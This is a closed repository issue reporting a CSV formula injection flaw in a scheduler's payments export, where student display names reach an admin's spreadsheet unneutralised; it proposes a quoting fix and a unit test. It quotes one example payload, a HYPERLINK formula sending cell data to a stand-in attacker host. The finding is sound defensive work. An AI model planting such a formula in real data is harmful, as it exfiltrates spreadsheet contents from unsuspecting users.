Unsupervised/unsupervised-scheduler
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

CSV formula injection in payments export via student display names #39

New Issue
Closed
opened 2026-06-10 18:50:30 +00:00 by thatguygriff · 0 comments
thatguygriff commented 2026-06-10 18:50:30 +00:00
Owner
Copy Link
Copy Source

Finding (security review — Medium)

PaymentReport::csvLine() (src/Payment/PaymentReport.php) quotes fields and doubles embedded quotes, but does not neutralise cells beginning with =, +, -, @, tab, or CR.

Students choose their own display_name at registration (src/Auth/RegistrationPage.php — sanitize_text_field permits all of those characters), and that name flows into the CSV the studio admin downloads via the payments report export (src/Payment/PaymentReportController.php).

A student named =HYPERLINK("https://evil.example/?"&A1,"total") becomes a live formula when the admin opens the report in Excel or Google Sheets (classic CSV/formula injection, can exfiltrate sheet data or worse with DDE).

Fix

In csvLine(), prefix a ' to any field starting with one of = + - @ \t \r before quoting, so spreadsheet apps treat it as text. Add a unit test covering a hostile display name.

## Finding (security review — Medium) `PaymentReport::csvLine()` (src/Payment/PaymentReport.php) quotes fields and doubles embedded quotes, but does not neutralise cells beginning with `=`, `+`, `-`, `@`, tab, or CR. Students choose their own `display_name` at registration (src/Auth/RegistrationPage.php — `sanitize_text_field` permits all of those characters), and that name flows into the CSV the studio admin downloads via the payments report export (src/Payment/PaymentReportController.php). A student named `=HYPERLINK("https://evil.example/?"&A1,"total")` becomes a live formula when the admin opens the report in Excel or Google Sheets (classic CSV/formula injection, can exfiltrate sheet data or worse with DDE). ## Fix In `csvLine()`, prefix a `'` to any field starting with one of `= + - @ \t \r` before quoting, so spreadsheet apps treat it as text. Add a unit test covering a hostile display name.
thatguygriff added the paymentssecurity labels 2026-06-10 18:50:30 +00:00
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
Labels
Clear labels
bug
Something isn't working
 enhancement
Extends an existing feature
 feature
New user-facing capability
 payments
Billing, Stripe, receipts, reporting
 security
Security vulnerability or hardening
No Label payments security
Milestone
No items
No Milestone
Projects
Clear projects
No project
Assignees
Clear assignees
thatguygriff (James Griffin-Allwood)
No Assignees
1 Participants
Notifications
Due Date
No due date set.
Dependencies

No dependencies set.

Reference: Unsupervised/unsupervised-scheduler#39
Delete Branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?